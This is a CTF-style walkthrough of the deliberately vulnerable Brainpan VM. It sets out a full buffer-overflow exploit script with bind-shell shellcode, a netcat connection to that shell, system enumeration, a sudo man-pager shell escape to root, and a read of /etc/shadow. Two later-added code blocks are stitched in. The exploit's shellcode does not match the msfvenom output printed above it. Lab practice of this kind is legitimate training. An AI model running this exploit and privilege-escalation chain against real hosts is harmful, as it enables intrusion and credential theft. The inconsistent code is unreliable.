Thursday, November 21, 2013

Brainpan Pentest VM Solution

BRAINPAN PENTEST VM SOLUTION BY 1N3

                          
      `7MN.   `7MF'       
 __,    MMN.    M         
`7MM    M YMb   M  pd""b. 
  MM    M  `MN. M (O)  `8b
  MM    M   `MM.M      ,89
  MM    M     YMM    ""Yb.
.JMML..JML.    YM       88
                  (O)  .M'
                   bmmmd' 
                          


# OVERVIEW
Brainpan is a deliberately vulnerable VM built for pentesting and hacking practice. For more info, see http://blog.techorganic.com/2013/03/brainpan-hacking-challenge.html. This walkthrough covers the basic steps to obtain "root" access on brainpan.

# DISCOVER HOSTS
netdiscover -r 192.168.1.0/24
_____________________________________________________________________________
   IP            At MAC Address      Count  Len   MAC Vendor
 -----------------------------------------------------------------------------
 192.168.1.132   00:0c:29:90:72:0d    01    060   VMware, Inc.

# PORT SCAN
nmap -sV 192.168.1.132
Nmap scan report for 192.168.1.132
Host is up (0.00041s latency).
Not shown: 998 closed ports
PORT      STATE SERVICE VERSION
9999/tcp  open  abyss?
10000/tcp open  http    SimpleHTTPServer 0.6 (Python 2.7.3)
1 service unrecognized despite returning data (nmap prints the raw fingerprint so it can be submitted at http://www.insecure.org/cgi-bin/servicefp-submit.cgi). Decoded, the fingerprint is the service's ASCII-art "WELCOME TO BRAINPAN" banner followed by an "ENTER THE PASSWORD >>" prompt, so the service on 9999/tcp reads a password from the client:
MAC Address: 00:0C:29:90:72:0D (VMware)

# DIRBUSTER
# scan 192.168.1.132:10000 with dirbuster
dirbuster & 

# dirbuster shows a static index.html page, a static image file, a bin directory, and brainpan.exe inside that bin directory.

# DOWNLOAD brainpan.exe
wget http://192.168.1.132:10000/bin/brainpan.exe

# RUN brainpan.exe FROM WINE...
wine brainpan.exe
[+] initializing winsock...done.
[+] server socket created.
[!] bind failed: 10048[+] bind done on port 9999
[+] waiting for connections.

* FROM THIS, WE CAN DETERMINE THAT brainpan.exe IS A WINDOWS BINARY RUNNING UNDER WINE ON LINUX, LISTENING ON PORT 9999/TCP ON THE REMOTE HOST (IT BINDS PORT 9999, THE SAME PORT nmap FOUND OPEN ON THE VM)...

# DEBUGGING & FUZZING
# Transfer brainpan.exe to a Windows XP machine and run it under a debugger (OllyDbg or Immunity Debugger). Send a unique pattern, read the value that overwrites EIP to find the offset, then find a suitable JMP ESP address inside the binary. Use msfvenom to create a Linux bind shell for the brainpan IP: the process runs under Wine on Linux, so the payload must be Linux shellcode, not Windows shellcode. Put these together into the working buffer overflow exploit (see below).


# GENERATE UNIQUE BUFFER
msf exploit(ms06_040_netapi) > ruby pattern_create.rb 1024
[*] exec: ruby pattern_create.rb 1024
Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B


#!/usr/bin/python
#Brainpan.exe fuzzer by 1N3 - 20131122


import socket

target = "192.168.1.119"   # host running brainpan.exe under the debugger (see above)

# 1024 byte unique string from pattern_create.rb
buffer = "Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B"

print "Fuzzing port 9999 with " + str(len(buffer))
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 9999))
s.recv(1024)                     # read the password prompt before sending
print "Sending evil buffer..." + buffer
s.send(buffer)
s.close()


root@bt:/mnt/sdb/nonxero/scripts/fuzzers# ./brainpan_fuzz.py
Fuzzing port 9999 with 1024
Sending evil buffer...Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0B
root@bt:/mnt/sdb/nonxero/scripts/fuzzers# 

msf exploit(ms06_040_netapi) > ruby pattern_offset.rb 35724134
[*] exec: ruby pattern_offset.rb 35724134

[*] Exact match at offset 524
* This means the four pattern bytes at offset 524 (bytes 524-528 of the buffer) land in EIP, so 520 bytes of filler plus the 4-byte saved EBP come before the return address...
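Added example (not the author's code and not the Metasploit source): a Python 3 re-implementation of the pattern_create / pattern_offset logic used above, showing why the EIP value 0x35724134 read from the debugger maps to offset 524 in the 1024-byte pattern.

```python
import itertools
import string


def pattern_create(length):
    """Build the cyclic pattern Aa0Aa1...Aa9Ab0... of exactly `length` chars.

    Each 3-char unit is (upper, lower, digit); the digit cycles fastest,
    then the lower-case letter, then the upper-case letter, so a 4-byte
    window is unique within the full 20280-character pattern.
    """
    units = (u + l + d for u in string.ascii_uppercase
             for l in string.ascii_lowercase
             for d in string.digits)
    pattern = "".join(itertools.islice(units, length // 3 + 1))
    return pattern[:length]


def pattern_offset(value, length=1024):
    """Return the offset of the 4-byte window matching `value`, or -1.

    `value` is the register contents as read in the debugger, as an int
    (0x35724134) or a hex string ("35724134"). x86 is little-endian, so
    the bytes that landed in memory are in reverse order: 0x35724134 is
    the substring "4Ar5" of the pattern.
    """
    if isinstance(value, str):
        value = int(value, 16)
    needle = value.to_bytes(4, "little").decode("ascii", errors="replace")
    return pattern_create(length).find(needle)


def eip_window(length=1024, eip=0x35724134):
    """Return (offset, chars): the four pattern bytes that overwrote EIP."""
    off = pattern_offset(eip, length)
    if off < 0:
        return off, ""
    return off, pattern_create(length)[off:off + 4]


if __name__ == "__main__":
    off, chunk = eip_window()
    print("EIP 0x35724134 = %r at offset %d" % (chunk, off))
```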

# CONSTRUCT OUR SHELLCODE...
msfvenom -p linux/x86/shell_bind_tcp LHOST=192.168.1.132 LPORT=4444 -b "\x00" -e x86/shikata_ga_nai
[*] x86/shikata_ga_nai succeeded with size 105 (iteration=1)
buf =
"\xda\xcd\xd9\x74\x24\xf4\xbf\x7d\x7b\x06\xd9\x5d\x33\xc9" +
"\xb1\x14\x83\xed\xfc\x31\x7d\x15\x03\x7d\x15\x9f\x8e\x37" +
"\x02\xa8\x92\x6b\xf7\x05\x3f\x8e\x7e\x48\x0f\xe8\x4d\x0a" +
"\x2b\xab\x1f\x62\xce\x53\xb1\x2e\xa4\x43\xe0\x9e\xb1\x85" +
"\x68\x78\x9a\x88\xed\x0d\x5b\x17\x5d\x09\xec\x71\x6c\x91" +
"\x4f\xce\x08\x5c\xcf\xbd\x8c\x34\xef\x99\xe3\x48\x46\x63" +
"\x04\x20\x76\xbc\x87\xd8\xe0\xed\x05\x71\x9f\x78\x2a\xd1" +
"\x0c\xf2\x4c\x61\xb9\xc9\x0f"


# CREATE THE EXPLOIT...
#!/usr/bin/python
# brainpan_exploit.py by 1N3 - 20131121
#
#      `7MN.   `7MF'       
# __,    MMN.    M         
#`7MM    M YMb   M  pd""b. 
#  MM    M  `MN. M (O)  `8b
#  MM    M   `MM.M      ,89
#  MM    M     YMM    ""Yb.
#.JMML..JML.    YM       88
#                  (O)  .M'
#                   bmmmd' 
#


import socket
import subprocess


# vars
target = "192.168.1.132"
buffer1 = '\x41' * 520            # filler up to the saved EBP (offsets 0-519)
ebp = '\x90' * 4                  # overwrites the saved EBP (offsets 520-523)
EIP = "\xf3\x12\x17\x31"          # 0x311712F3 JMP ESP in brainpan.exe, little-endian (offsets 524-527)
command = "nc -vv 192.168.1.132 4444"   # connect to the bind shell once the payload runs


# shellcode: linux/x86/shell_bind_tcp on port 4444 (msfvenom output above, 105 bytes)
shellcode = ("\xd9\xea\xd9\x74\x24\xf4\xbb\xda\x05\x64\xb7\x5a\x29\xc9" +
"\xb1\x14\x31\x5a\x19\x03\x5a\x19\x83\xc2\x04\x38\xf0\x55" +
"\x6c\x4b\x18\xc6\xd1\xe0\xb5\xeb\x5c\xe7\xfa\x8a\x93\x67" +
"\xa1\x0c\x7e\x0f\x54\xb1\x6f\x93\x32\xa1\xde\x7b\x4a\x20" +
"\x8a\x1d\x14\x6e\xcb\x68\xe5\x74\x7f\x6e\x56\x12\xb2\xee" +
"\xd5\x6b\x2a\x23\x59\x18\xea\xd1\x65\x47\xc0\xa5\xd3\x0e" +
"\x22\xcd\xcc\xdf\xa1\x65\x7b\x0f\x24\x1c\x15\xc6\x4b\x8e" +
"\xba\x51\x6a\x9e\x36\xaf\xed")


# NOP sled in front of the shellcode; JMP ESP lands at its start
NOOP_sled = '\x90' * 104


# construct entire buffer - 520 + 4 + 4 + 104 + 105 = 737 bytes
buffer = buffer1 + ebp + EIP + NOOP_sled + shellcode


print "**********************************************"
print "buffer1 length: " + str(len(buffer1))
print "EIP length: " + str(len(EIP))
print "shellcode length: " + str(len(shellcode))
print "NOOP_sled length: " + str(len(NOOP_sled))
print "Total buffer length: " + str(len(buffer))
print "**********************************************"
print "Fuzzing " + target + " on port 9999 with " + str(len(buffer)) + " bytes"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, 9999))
s.recv(1024)                      # read the password prompt before sending
print "Sending evil buffer..." + buffer
s.send(buffer)
print "Done..."
print "Connecting to bind shell..."
subprocess.call(command.split())  # runs nc in the foreground until the shell is closed
print "Done..."
s.close()


# EXPLOIT
root@bt:/scripts/fuzzers# ./brainpan_exploit.py
**********************************************
buffer1 length: 520
EIP length: 4
shellcode length: 105
NOOP_sled length: 104
Total buffer length: 737
**********************************************
Fuzzing 192.168.1.132 on port 9999 with 737 bytes
Sending evil buffer...AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA[... 520 x 'A', followed by the EBP/EIP overwrite, NOP sled and shellcode as raw non-printable bytes ...]
Done...
Connecting to bind shell...

nc -vv 192.168.1.132 4444
whoami
puck
pwd
/home/puck/web


# DISTRO VERSION
cat /etc/release
Ubuntu 12.10

uname -a
Linux version 3.5.0-25-generic


# PROCESSES
ps -auxxx

root       732     1  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
root       838   732  0 06:47 ?        00:00:00 /usr/sbin/winbindd -F
...
...
puck       910   909  0 06:47 ?        00:00:00 /bin/sh -c /home/puck/checksrv.sh
puck       911   910  0 06:47 ?        00:00:00 /bin/bash /home/puck/checksrv.sh
puck       926   911  0 06:47 ?        00:00:02 /usr/bin/python -m SimpleHTTPServer 10000
puck      1693     1  0 08:49 ?        00:00:00 /bin//sh
puck      1949     1  0 08:53 ?        00:00:00 /home/puck/web/bin/brainpan.exe
puck      1953     1  0 08:53 ?        00:00:00 /usr/bin/wineserver
puck      1959     1  0 08:53 ?        00:00:00 C:\windows\system32\services.exe
puck      1963     1  0 08:53 ?        00:00:00 C:\windows\system32\winedevice.exe MountMgr
puck      1972     1  0 08:53 ?        00:00:00 C:\windows\system32\plugplay.exe


# CRONTAB
cat /etc/crontab
# what can I do with this? file is owned by root and run by root but how to edit?
# m h  dom mon dow   command
* * * * * /home/puck/checksrv.sh


# SHOW LAST USERS TO LOGIN
last
root     tty1                          Mon Mar  4 13:43 - 13:43  (00:00)
anansi   tty3                          Mon Mar  4 12:17 - 13:38  (01:20)
anansi   tty3                          Mon Mar  4 12:17 - 12:17  (00:00)
puck     tty3                          Mon Mar  4 11:30 - 12:17  (00:47)
puck     tty3                          Mon Mar  4 11:30 - 11:30  (00:00)
puck     tty2                          Mon Mar  4 11:07 - 13:38  (02:30)
puck     tty2                          Mon Mar  4 11:07 - 11:07  (00:00)
anansi   tty2                          Mon Mar  4 11:03 - 11:07  (00:04)
anansi   tty2                          Mon Mar  4 11:03 - 11:03  (00:00)
anansi   tty2                          Mon Mar  4 10:58 - 10:59  (00:01)
anansi   tty2                          Mon Mar  4 10:58 - 10:58  (00:00)
reynard  tty1                          Mon Mar  4 10:48 - 13:43  (02:54)
reynard  tty1                          Mon Mar  4 10:48 - 10:48  (00:00)


# USERS
cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
messagebus:x:102:104::/var/run/dbus:/bin/false
reynard:x:1000:1000:Reynard,,,:/home/reynard:/bin/bash
anansi:x:1001:1001:Anansi,,,:/home/anansi:/bin/bash
puck:x:1002:1002:Puck,,,:/home/puck:/bin/bash


# SEARCH HOME DIRECTORY FILES
ls -lhaR /home/

/home/puck/.wine:
total 816K
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
-rw-rw-r--  1 puck puck   11 Mar  4  2013 .update-timestamp
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 dosdevices
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 drive_c
-rw-rw-r--  1 puck puck 761K Nov 19 08:53 system.reg
-rw-rw-r--  1 puck puck  26K Nov 19 08:53 user.reg
-rw-rw-r--  1 puck puck 2.1K Mar  4  2013 userdef.reg


/home/puck/.wine/dosdevices:
total 8.0K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 4 puck puck 4.0K Nov 19 08:53 ..
lrwxrwxrwx 1 puck puck   10 Mar  4  2013 c: -> ../drive_c
lrwxrwxrwx 1 puck puck    1 Mar  4  2013 z: -> /

/home/puck/.wine/drive_c:
total 20K
drwxrwxr-x  5 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x  4 puck puck 4.0K Nov 19 08:53 ..
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 Program Files
drwxrwxr-x  4 puck puck 4.0K Mar  4  2013 users
drwxrwxr-x 13 puck puck 4.0K Mar  4  2013 windows

/home/puck/.wine/drive_c/Program Files:
total 16K
drwxrwxr-x 4 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 5 puck puck 4.0K Mar  4  2013 ..
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Common Files
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 Internet Explorer

/home/puck/.wine/drive_c/Program Files/Common Files:

/home/puck/web:
total 816K
drwxrwxr-x  3 puck puck 4.0K Mar  4  2013 .
drwx------ 11 puck puck 4.0K Nov 19 08:51 ..
drwxrwxr-x  2 puck puck 4.0K Mar  4  2013 bin
-rw-rw-r--  1 puck puck  215 Mar  4  2013 index.html
-rw-------  1 puck puck 797K Mar  4  2013 soss-infographic-final.png

/home/puck/web/bin:
total 32K
drwxrwxr-x 2 puck puck 4.0K Mar  4  2013 .
drwxrwxr-x 3 puck puck 4.0K Mar  4  2013 ..
-rwxr-xr-x 1 puck puck  21K Mar  4  2013 brainpan.exe

# What development tools/languages are installed/supported?
which perl
which python
/usr/bin/perl
/usr/bin/python

# How can files be uploaded?
which wget
which nc
which netcat
which scp
which ftp
/usr/bin/wget
/bin/nc
/bin/netcat
/usr/bin/scp
/usr/bin/ftp

# RUNNING PORTS/SERVICES
# Both services running as user 'puck'... not sure that will help me get root....

lsof -i:9999
COMMAND    PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
brainpan. 1949 puck   10u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
brainpan. 1949 puck   11u  IPv4  26008      0t0  TCP *:9999 (LISTEN)
wineserve 1953 puck   27u  IPv4  26008      0t0  TCP *:9999 (LISTEN)

lsof -i:10000
COMMAND PID USER   FD   TYPE DEVICE SIZE/OFF NODE NAME
python  926 puck    3u  IPv4   8661      0t0  TCP *:webmin (LISTEN)

# RUNNING SERVICES LOCALLY
netstat -luntp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:9999            0.0.0.0:*               LISTEN      1756/brainpan.exe
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN      924/python     
udp        0      0 0.0.0.0:39859           0.0.0.0:*                           -              
udp        0      0 0.0.0.0:68              0.0.0.0:*                           - what's this port do?              
udp6       0      0 :::22091                :::*     


# BREAK OUT OF NETCAT SHELL TO BASH SHELL
python -c 'import pty;pty.spawn("/bin/bash")'
puck@brainpan:/home/puck/privesc$ ls
ls
allfiles.tar.gz    linux_gather_files.sh  linux_privesc_check
linux_checksec.sh  linux_priv_esc.sh      out
puck@brainpan:/home/puck/privesc$  

# CHECK SUDO COMMANDS AVAILABLE
puck@brainpan:/home/puck$ sudo -l
sudo -l
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin


User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util man ls
sudo /home/anansi/bin/anansi_util man ls
'unknown': unknown terminal type.

# RUN THE SUDO COMMAND TO OPEN A MAN PAGE (THE 'unknown terminal type' ERROR ABOVE MEANS TERM IS NOT SET IN THE NETCAT SHELL)
puck@brainpan:/home/puck$ sudo /home/anansi/bin/anansi_util manual man

MAN(1)                        Manual pager utils                        MAN(1)


NAME
       man - an interface to the on-line reference manuals


SYNOPSIS
       man  [-C  file]  [-d]  [-D]  [--warnings[=warnings]]  [-R encoding] [-L
       locale] [-m system[,...]] [-M path] [-S list]  [-e  extension]  [-i|-I]
       [--regex|--wildcard]   [--names-only]  [-a]  [-u]  [--no-subpages]  [-P
       pager] [-r prompt] [-7] [-E encoding] [--no-hyphenation] [--no-justifi‐
       cation]  [-p  string]  [-t]  [-T[device]]  [-H[browser]] [-X[dpi]] [-Z]
       [[section] page ...] ...
       man -k [apropos options] regexp ...
       man -K [-w|-W] [-S list] [-i|-I] [--regex] [section] term ...
       man -f [whatis options] page ...
       man -l [-C file] [-d] [-D] [--warnings[=warnings]]  [-R  encoding]  [-L
       locale]  [-P  pager]  [-r  prompt]  [-7] [-E encoding] [-p string] [-t]
       [-T[device]] [-H[browser]] [-X[dpi]] [-Z] file ...
       man -w|-W [-C file] [-d] [-D] page ...
       man -c [-C file] [-d] [-D] page ...
       man [-hV]


DESCRIPTION
 Manual page man(1) line 1 (press h for help or q to quit)
DESCRIPTION
       man is the system's manual pager. Each page argument given  to  man  is
 Manual page man(1) line 2 (press h for help or q to quit)!/bin/bash


# TYPE !/bin/bash AT THE MAN PAGE PROMPT: THE PAGER'S SHELL ESCAPE SPAWNS A SHELL, WHICH RUNS AS "ROOT" BECAUSE anansi_util WAS STARTED VIA sudo
!/bin/bash

root@brainpan:/usr/share/man# whoami
whoami
root
root@brainpan:/usr/share/man#
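Added example (not the author's code): a Python 3 audit helper that parses the `sudo -l` output format shown above and flags the weaknesses that led to root here, namely a passwordless root rule for a binary living under another user's home directory, and a wrapper that runs a pager whose `!` shell escape inherits root. The fact that anansi_util runs `man` is supplied by the caller (it is what the page demonstrates); the SHELL_ESCAPE_CMDS table is an assumption.

```python
import re

# Constructed sample: a copy of the `sudo -l` output shown in the walkthrough.
SUDO_L_OUTPUT = """\
Matching Defaults entries for puck on this host:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\\:/usr/local/bin\\:/usr/sbin\\:/usr/bin\\:/sbin\\:/bin

User puck may run the following commands on this host:
    (root) NOPASSWD: /home/anansi/bin/anansi_util
"""

# Assumption: programs that offer an interactive shell escape (the pager's
# "!" command, an editor's ":!"); the page demonstrates the `man` case.
SHELL_ESCAPE_CMDS = {"man", "less", "more", "vi", "vim"}

# Matches "(runas) TAG1: TAG2: /path/to/command" lines of `sudo -l`.
ENTRY_RE = re.compile(r"^\s*\(([^)]+)\)\s+((?:[A-Z]+:\s*)*)(.+?)\s*$")


def parse_sudo_l(text):
    """Return [(runas, tags, command)] from the 'may run' section of `sudo -l`."""
    entries, in_cmds = [], False
    for line in text.splitlines():
        if line.startswith("User ") and "may run" in line:
            in_cmds = True
            continue
        m = ENTRY_RE.match(line) if in_cmds else None
        if m:
            runas, tagstr, cmd = m.groups()
            tags = {t.rstrip(":") for t in tagstr.split()}
            entries.append((runas, tags, cmd))
    return entries


def audit_entry(runas, tags, cmd, wraps=()):
    """Return the findings for one rule.

    `wraps` lists programs the command is known to invoke; for anansi_util
    the page shows it runs `man`. This helper does not inspect the binary.
    """
    findings = []
    if runas in ("root", "ALL") and "NOPASSWD" in tags:
        findings.append("root without a password: " + cmd)
    home = re.match(r"^/home/([^/]+)/", cmd)
    if home:
        findings.append("command lives under /home/%s, a path root does not "
                        "control; whoever can write there can replace it"
                        % home.group(1))
    for prog in wraps:
        if prog in SHELL_ESCAPE_CMDS and "NOEXEC" not in tags:
            # noexec blocks every child process of the command, so confirm
            # the wrapper still does its job before relying on it.
            findings.append("runs %s, whose shell escape inherits %s; add "
                            "'Defaults!%s noexec' (or the NOEXEC: tag)"
                            % (prog, runas, cmd))
    return findings


def audit(text, wraps_by_cmd):
    """Audit every entry; `wraps_by_cmd` maps command path -> programs it runs."""
    return {cmd: audit_entry(runas, tags, cmd, wraps_by_cmd.get(cmd, ()))
            for runas, tags, cmd in parse_sudo_l(text)}


if __name__ == "__main__":
    report = audit(SUDO_L_OUTPUT, {"/home/anansi/bin/anansi_util": ["man"]})
    for cmd, found in report.items():
        print(cmd)
        for f in found:
            print("  -", f)
```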

# GATHER /etc/shadow file
root@brainpan:/usr/share/man# cat /etc/shadow
cat /etc/shadow